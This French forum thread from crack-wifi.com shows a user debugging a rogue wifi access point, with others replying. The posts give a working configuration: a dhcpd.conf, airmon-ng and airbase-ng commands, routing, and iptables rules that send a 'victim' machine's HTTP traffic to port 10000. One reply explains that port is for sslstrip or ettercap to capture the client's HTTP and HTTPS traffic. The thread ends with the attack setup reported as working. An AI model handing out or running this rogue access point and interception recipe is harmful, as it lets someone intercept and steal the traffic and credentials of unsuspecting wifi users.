Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 08-10-2010 18:57:37

pinedepain
Membre
Inscription : 08-10-2010
Messages : 11

Rogue AP, je tourne en rond!

Bonjour à tous !

Je suis nouveau sur le forum et j'ai vu qu'il y a une bonne ambiance et quelques gars doués wink.

Je me lance donc dans mon premier poste concernant un soucis de Rogue AP !
Avant toute chose, j'ai bien évidemment fait tous les tutos disponibles sur le net, chacun au moins 5 fois ...

J'ai aussi lus quelques postes ici présent :
http://www.crack-wifi.com/forum/viewtopic.php?id=3044
http://www.crack-wifi.com/forum/viewtopic.php?id=3044

et malheureusement je tourne encore et toujours en ROND avec la création d'un Rogue AP stable.

Voici le topo (au passage, j'écris ce que j'ai compris, n'hésitez pas à me corriger, c'est peut-être un problème de connaissances. En tout cas, j'ai un réel désire de comprendre la manoeuvre globale, y compris la manipulation des l'iptables et du route, n'hésitez pas à partager votre savoir!) :

PC1 : Eeepc1005h avec Ubuntu 10.04 (carte wifi + connection ethernet à une livebox d'IP local 192.168.1.1)
PC2 : Machine de bureau avec Windows XP SP3 (dongle wifi sagem)

Pour informations, on ne sais jamais -->
sur PC1 : ifconfig eth0 = inet adr:192.168.1.11  Bcast:192.168.1.255  Masque:255.255.255.0

Les étapes que j'ai suivi :

- Etape 1 : Mon fichier /etc/dhcpd3/dhcpd.conf

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.1.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.1.255;
option routers 192.168.1.129;
option domain-name-servers 8.8.8.8; // (Ok, le DNS n'est pas "top" mais le problème n'est pour l'instant pas là)
range 192.168.1.130 192.168.1.140;
}

- Etape 2 : Création du Fake AP

airmon-ng start wlan0

// --> création d'un support virtuel en mode "monitor" nommé mon0

airbase-ng -C 30 -c 6 -e "test" -v mon0

// --> création d'un fake AP nommé "test" en écoute sur le support virtuel at0, j'enlève l'option -P car je trouve que c'est un peu le bordel un AP qui change de nom à la volé en fonction des clients du coin

- Etape 3 : Si j'ai bien compris, paramétrage de notre at0 en lui attribuant une IP et un masque de sous-réseau

modprobe tun ;
ifconfig at0 up ;
ifconfig at0 192.168.1.129 netmask 255.255.255.128 ;
ifconfig at0 mtu 1400 ;
route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129 ;

// Je ne pige pas très bien la dernière ligne, on ajoute une redirection du sous-réseau 192.168.1.128 vers at0 (192.168.1.129) ?

- Etape 4 : Lancement du serveur DHCP. Alors là, j'ai pas les même manip, mais le DHCP se lance sans soucis et fait son boulot, donc le problème n'est pas là non plus, je pense.

echo 1 > /proc/sys/net/ipv4/ip_forward // On autorise le forwarding sur notre laptop
ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid // Pour régler le petit soucis de dhcpd.pid
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0 (cf. contenu au début du post)

- Etape 5 : Mise à jour de iptables. // Du peu que j'ai compris, on fait en sorte que la liaison se passe bien entre at0 et eth0 afin que la victime ai accès à internet sur le rogue AP

iptables --flush ;
iptables --table nat --flush ;
iptables --delete-chain ;
iptables --table nat --delete-chain ;
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE ;
iptables --append FORWARD --in-interface at0 -j ACCEPT ;
iptables -t nat -A PREROUTING -p udp -j DNAT --to 212.27.40.240 ;
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 ;

Côté machine victime (PC2). Je vois mon fake AP dans mon gestionnaire, je tente de me connecter dessus et là c'est le drame : desfois j'obtiens une IP, desfois pas (selon les moultes options des moultes tutos que je teste). Pourtant dans les logs système nous avons bien dhcpd3 qui tente tant bien que mal de faire son boulot :
DHCPREQUEST, DHCPACK, DHCPDISCOVER, DHCPOFFER, etc ... en boucle d'ailleurs, ça spam à moitié le log, est-ce normal?

Mais le dernier teste est celui du post 3044 de ce forum, et l'obtention n'était pas trop mauvaise MAIS :

- PC2 se déconnecte intenpestivement du fake AP

- PC2 ping TRES mal le fake AP (192.168.1.129) alors qu'ils se trouvent à moins d'un mètre l'un de l'autre.
Par ping très mal j'entend qu'il fait parfois un 100% packet loss, et desfois un 75%, quand je ping 192.168.1.129 juste après m'être connecté au fake AP. Par contre le ipconfig /all me donnes toutes les informations correctes avec comme passerelle par défaut : 192.168.1.129. Bien évidemment le ping du DNS sur le PC2 marche 1 fois sur 100 et la connection internet pas du tout ... Mon idée est que PC1 bloque le trafique entrant ou alors ne le réceptionne pas bien (pourquoi?) créant ainsi des petites déco, un ping quasi inexistant de PC2 vers PC1 et du coup ben ... pour faire simple, ça fait tout foirer big_smile.

Si quelqu'un a une idée, un éclair de génie ou tout simplement la réponse, je suis preneur big_smile

Merci à tous ceux qui prendront le temps de lire se poste de tenter d'y répondre smile

Dernière modification par pinedepain (10-10-2010 13:10:25)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 08-10-2010 19:12:21

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Rogue AP, je tourne en rond!

Salut

pour commencer j'ai tester plusieurs carte wifi et de rogue ap si tous marche mais foire en tant que client je changerais la sagem pour une autre et je testerai

j'ai une sagem la wl5061s celle qui fait marcher airodump sous win et j'ai eu des soucis avec cette carte alors j'ai changer et miracle

si ça peut aider

Bonne chance sinon smile

Hors Ligne

#3 09-10-2010 00:52:11

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP, je tourne en rond!

Merci pour la clarté de ton post, ça donne tout de suite envie de se pencher sur le problème.

Quelques petites choses:

- Pourquoi ne pas utiliser un live-cd de BT4 puisqu'on tourne tous plus ou moins dessus pour nos différents tests, au moins pas risques d'incompatibilité avec nos scripts (peu fréquent mais on ne sait jamais).

- A première vue tu n'utilises que la carte intégrée à ton EeePC, qui supporte, à mon grand étonnement l'injection. Cependant, si tel est le cas, je doute qu'elle soit des plus performantes pour la réalisation d'une Rogue AP, si tu as quelques euros à rendre utile, investi dans une Alpha 36H, c'est top et ça te sera bien utile par la suite, tu verras !

- Si le tout "fonctionne" par moment, c'est que ta Rogue est correctement configurée (au niveau du DHCP, du dhcpd.conf, de l'at0 et tout le tralalala).

- Le problème se situe donc pour moi au niveau de la carte wifi. Tu pourrais éventuellement tenter de jouer avec la valeur du MTU mais bien que ce soit préconisé par beaucoup de personnes, je n'y crois malheureusement pas trop.

Qu'en dis-tu ?

Sinon globalement tu sembles bien avoir compris le fonctionnement de la "chose", mise à part quelques petits points:

- option domain-name-servers 8.8.8.8; --> Prend plutôt un OpenDns genre 208.67.222.222

- at0 c'est l'interface créée par airbase-ng. En gros ça va être, pour le client, le routeur. D'ou l'intérêt de la table-routage que tu envoies juste après.

- Pour ce qui est des règles iptables, à quelques détails près et de façon très générale c'est ça, on permet à at0 de répondre aux requêtes des clients de ta Rogue sur le réseau donné par celle-ci.
Exception faite de la dernière ligne qui est spécifique à une utilisation d'Sslstrip (si tel n'est pas ton but alors évite de la rentrer): en gros tu renvoie tout le trafic du port 80 (HTTP) vers un port définit, sur lequel sslstrip/ettercap restent en écoute pour pwned le client, tant sur du http que du https.

Je suis fatigué donc ma réponse est mal agencée et peu construite mais n'hésite pas à répondre si jamais tu y vois des objections, je répondrais une fois réveillé d'une nuit correcte smile

En espérant que tu t'en sorte, hésite pas à revenir poster tes soucis, encore et encore, c'est comme ça qu'on avance (c.f mes nombreux posts)


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#4 10-10-2010 13:08:00

pinedepain
Membre
Inscription : 08-10-2010
Messages : 11

Re : Rogue AP, je tourne en rond!

Bonjour à tous! Et tout d'abord, merci pour votre aide!

J'ai donc investigué la chose. En observant les packets sur wireshark (sur le PC1 et PC2), je me suis rendu compte que mon eeepc (PC1) fait exactement le travail demandé, mais que le PC2 ne reçois pas ou presque pas les paquets envoyé par le PC1. Pour être sûr que celà viens du dongle wifi, j'ai modifié le schéma, et je conseil à tous ceux qui souhaitent comprendre un peu mieux le principe fondamentale du Rogue AP de tenter la démarche suivante (un bon moyen de savoir ce que l'on fait). 

J'ai choisi de récupérer la connection internet depuis mon PC1 en étant connecté en wifi à la livebox et de récupérer les demande DHCP sur mon eth0 du PC1. Tout marchais bien, donc la conclusion était bien que le dongle foirais. J'ai testé de mettre le dongle sous Ubuntu sur le PC2 (schéma originel) et là, tout marchais niquel aussi !! (Merci windaube, on ne le dira jamais assez).

Pour ce qui est de ma carte wifi, effectivement elle est très bien supporté par la suite aicrack-ng, out of the box ! De plus, je n'ai pas eu de soucis pour réaliser tous les transferts (entrée DHCP et sortie internet) sur la même carte wifi. Donc même plus besoin de eth0 smile.

Merci à tous!

Dernière modification par pinedepain (10-10-2010 13:09:44)

Hors Ligne

#5 10-10-2010 15:27:27

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP, je tourne en rond!

Ravis que tout fonctionne pour toi :-D
Hésite pas à aller voir du coté du développement de notre tool : GTWPA (http://www.crack-wifi.com/forum/viewtopic.php?id=4538), tu verras, on pousse le vice de la Rogue_AP encore plus loin !

Bien à toi,

Carto_


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#6 13-10-2010 22:12:43

us3r
Membre Hyperactif
Lieu : Besancon
Inscription : 26-10-2009
Messages : 61

Re : Rogue AP, je tourne en rond!

Salut,

Je trouve ton Post très bien. J'en ai posté un il y a quelques temps et j'avais eu aussi des problemes de configuration. J'ai perdu toutes mes notes et je vais reprendre les tiennes. Au final, avec toutes les commandes que tu as écrites, cela fonctionne ?

Hors Ligne

#7 13-10-2010 23:02:31

pinedepain
Membre
Inscription : 08-10-2010
Messages : 11

Re : Rogue AP, je tourne en rond!

Oui tout marche bien! En tout cas sur Ubuntu 10.04, pas sous Backtrack hmm.

Cf mon nouveau post à problème, lol smile.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
106 2105 28-11-2016 19:42:10 par koala
35 1715 23-11-2016 16:31:33 par roofnat
16 1031 17-11-2016 12:22:00 par disquette
10 414 11-11-2016 22:11:03 par koala
[ Projet Rogue AP ] par shirocen
16 444 19-10-2016 05:14:45 par shirocen

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.026 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]